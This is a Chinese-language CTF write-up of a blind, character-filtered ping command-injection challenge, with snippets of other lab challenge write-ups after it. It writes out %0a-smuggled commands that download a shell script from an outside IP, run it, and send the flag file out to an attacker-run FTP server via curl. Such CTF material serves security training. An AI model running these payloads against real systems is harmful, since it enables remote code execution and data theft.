過濾了很多字元,並且沒有回顯。
可以採用%0a執行命令。ftp傳入檔案。nc的方式當時試了,但是失敗了,轉而搭建ftp,用ftp傳檔案。
在伺服器搭建ftp。
搭建ftp過程中碰到了個坑,記得搭建好之後,設定一下ftp的目錄許可權,不然用正確的帳號密碼卻一直連不上
ftp目錄下放乙個sh
sh的內容:curl -t /tmp/1.txt -u root:root
然後命令執行:
ping 127.0.0.1 %0a curl 106.54.149.185/1.sh > /tmp/1.sh
ping 127.0.0.1 %0a chmod 777 /tmp/1.sh //設定檔案讀寫許可權
ping 127.0.0.1 %0a cat /flag> /tmp/1.txt
ping 127.0.0.1 %0a sh /tmp/1.sh
全部「ping成功」後,在ftp資料夾看到 1.txt,拿到flag
nyctf
為什麼是 /flag
ping ip=127.0.0.1 %0a cat /flag 「ping 成功」,找到flag位置。 如果不在,會提示"ping 失敗"
實驗室每日一題WP 11月25日
題目是asis ctf 2019 quals unicorn shop原題,除了我把 獨角獸 換成了 小豬佩奇。有所修改,其他沒動。開啟題目http 可以看出是讓購買小豬佩奇,但是只允許輸入乙個字元,而小豬佩奇的 是1337.0,這時候檢視網頁原始碼,可以看到提示 為utf8編碼,然後了解一下utf...
實驗室每日一題wp
拿到隊友的題目 太簡單別罵我 多個不同型別的檔案,首先都開啟看看,以方便得知做題順序 key是解另乙個加密的another key檔案,裡面的解jpg,ok,現在大體順序清楚了 開始進入正題 1.分析key.txt 內容為 chikenhead pw1tsdaospwsrnoasdosr 經過嘗試是...
實驗室每日一題 2020 11 24
解壓縮後開啟題目.txt,可以看出裡面是16進製制的資料,而且開頭的504b0304是zip檔案的檔案頭,結尾的ffd9是jpg檔案的檔案尾。再結合題目描述可以知道這串16進製制數最起碼包含了乙個zip檔案和乙個jpg檔案。然後就是寫 把這串16進製制資料轉化為正常檔案 好像直接扔010或者winh...